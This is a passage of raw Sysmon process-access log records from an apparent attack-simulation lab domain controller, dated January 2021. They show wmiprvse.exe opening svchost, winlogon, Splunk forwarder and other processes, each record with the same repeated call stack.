15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program 